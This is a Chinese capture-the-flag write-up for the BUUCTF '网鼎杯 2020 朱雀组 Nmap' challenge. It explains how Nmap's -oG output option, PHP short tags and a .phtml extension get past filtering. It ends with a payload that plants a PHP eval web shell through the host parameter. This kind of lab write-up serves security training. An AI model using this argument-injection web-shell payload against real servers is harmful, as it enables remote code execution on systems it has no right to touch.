首页 > 其他分享 >BUUCTF: [网鼎杯 2020 朱雀组]Nmap

BUUCTF: [网鼎杯 2020 朱雀组]Nmap

时间:2023-06-19 22:01:23浏览次数:42  
标签:文件 BUUCTF 输出 oG E6% 文件格式 2020 网鼎杯 php


https://buuoj.cn/challenges#[%E7%BD%91%E9%BC%8E%E6%9D%AF%202020%20%E6%9C%B1%E9%9B%80%E7%BB%84]Nmap

BUUCTF: [网鼎杯 2020 朱雀组]Nmap_xml


会把扫描结果导出到一个文件里面

BUUCTF: [网鼎杯 2020 朱雀组]Nmap_BUUCTF_02


BUUCTF: [网鼎杯 2020 朱雀组]Nmap_php_03


给参数f传一个错误的文件名

BUUCTF: [网鼎杯 2020 朱雀组]Nmap_php_04

通过报错发现使用了simplexml_load_file(),那说明导出的文件格式是xml

BUUCTF: [网鼎杯 2020 朱雀组]Nmap_文件名_05

使用输出格式可以将指定的内容输出到指定的文件格式

BUUCTF: [网鼎杯 2020 朱雀组]Nmap_BUUCTF_06


BUUCTF: [网鼎杯 2020 朱雀组]Nmap_xml_07

即便执行失败也无所谓,Nmap会将执行语句记录输出文件。控制输出文件内容以及文件格式就可以解析了

题目环境经过测试可以发现只有-oG是可以执行的,可以先上线一个shell,然后在服务器中检查使用其他参数的结果。就会发现只有-oG是能正常执行的。

但是这里还有些过滤,比如过滤了关键字php,可以使用php 短标签:https://www.php.net/manual/zh/language.basic-syntax.phptags.php

然后还有escapeshellarg()escapeshellcmd()对传入的参数的保护(感觉有点点猜的意思

还有就是php的文件无法写入,尝试写入一些可能会解析的其他文件后缀

最终payload

host=' <?= @eval($_POST[7]); ?> -oG mc.phtml '

BUUCTF: [网鼎杯 2020 朱雀组]Nmap_xml_08


标签:文件,BUUCTF,输出,oG,E6%,文件格式,2020,网鼎杯,php
From: https://blog.51cto.com/u_16159500/6517887

相关文章

  • BUUCTF:[极客大挑战 2019]BabySQL
    题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]BabySQL简单测试之后发现有些字符被过滤,初步判断这里的过滤是指特殊字符被替换为空,如下图所示使用Burp进行SQL过滤字符的Fuzz这些长度为726响应内容是Inputyourusernameandpass......
  • BUUCTF:zip
    题目地址:https://buuoj.cn/challenges#zip很多压缩包,但是里面的内容非常小,小于5字节,可以尝试使用CRC32爆破得到其内容先以out0.zip做个例子,out0.zip的CRC32校验码为:0x75f90d3aPSD:\Tools\Misc\crc32>python.\crc32.pyreverse0x75f90d3a4bytes:{0x7a,0x35,0x42,0x7a}ve......
  • 第一届赣网杯网络安全大赛 2020GW-CTF Misc_Writeup
    目录签到CheckinfaceDestroyJavaHidepig签到Checkinflag{welc0me_to_ganwangbei}faceLennyfuckinterpreterhttps://github.com/Knorax/Lennyfuck_interpreter跟着对照表替换即可++++++++++[->++++++++++<]>++.++++++.<+++[->---<]>--.++++++.<++++[->++++<......
  • BUUCTF:梅花香自苦寒来
    题目地址:https://buuoj.cn/challenges#%E6%A2%85%E8%8A%B1%E9%A6%99%E4%B9%8B%E8%8B%A6%E5%AF%92%E6%9D%A5题目如下:使用010editor打开在图片结尾FFD9后存在一大串十六进制,把这些字符复制出来,将十六进制转为字符十六进制转字符:https://coding.tools/tw/hex-to-ascii类似坐标,可......
  • BUUCTF:刷新过的图片
    题目地址:https://buuoj.cn/challenges#%E5%88%B7%E6%96%B0%E8%BF%87%E7%9A%84%E5%9B%BE%E7%89%87F5隐写,利用工具:F5-steganography:https://github.com/matthewgao/F5-steganography得到的output.txt明显是个zip文件修改后缀为zipzip伪加密解压得到flagflag{96efd0a2037d06f34199......
  • BUUCTF:面具下的flag
    题目地址:https://buuoj.cn/challenges#%E9%9D%A2%E5%85%B7%E4%B8%8B%E7%9A%84flag题目如下:binwalk分析,发现有隐藏了zip,foremost分离得到一个压缩包zip伪加密解压得到flag.vmdkvmdk文件可以用7z解压7zxflag.vmdk-o./第一部分flag在key_part_one/NUL++++++++++[->+++++++++......
  • BUUCTF:qr
    题目地址:https://buuoj.cn/challenges#qrFlag{878865ce73370a4ce607d21ca01b5e59}......
  • BUUCTF:LSB
    题目地址:https://buuoj.cn/challenges#LSB题目提示是:LSB使用stegsolve打开,在Redplane0、Grennplane0、Blueplane0通道发现图片的上方好有东西Analyse->DataExtract调整至如下,发现这是一张图片,SaveBin保存为flag.png`cumtctf{1sb_i4_s0_Ea4y}......
  • 虚拟机VMware安装Kali 2020.1b
    本次安装版本:KaliLinux64-Bit2020.1bkali系统镜像下载在虚拟机VMware中安装kali,官网下载iso镜像虚拟机自己动手安装,或者下载官网的VMware文件然后导入虚拟机也行官方最新版kali:https://www.kali.org/downloads/官方历史版本kali:http://old.kali.org/kali-images/下载好得镜像最......
  • BUUCTF:[ISITDTU 2019]EasyPHP
    题目地址:BUUCTF:[ISITDTU2019]EasyPHPRefer:https://tiaonmmn.github.io/2019/07/18/ISITDTU-Easy-PHP/思路很简单,绕过这两个if即可任意代码执行先看一下第一个正则匹配看不懂的推荐使用这个网站:https://regex101.com/if(preg_match('/[\x00-0-9\'"`$&.,|[{_defgops\x7F]+/i......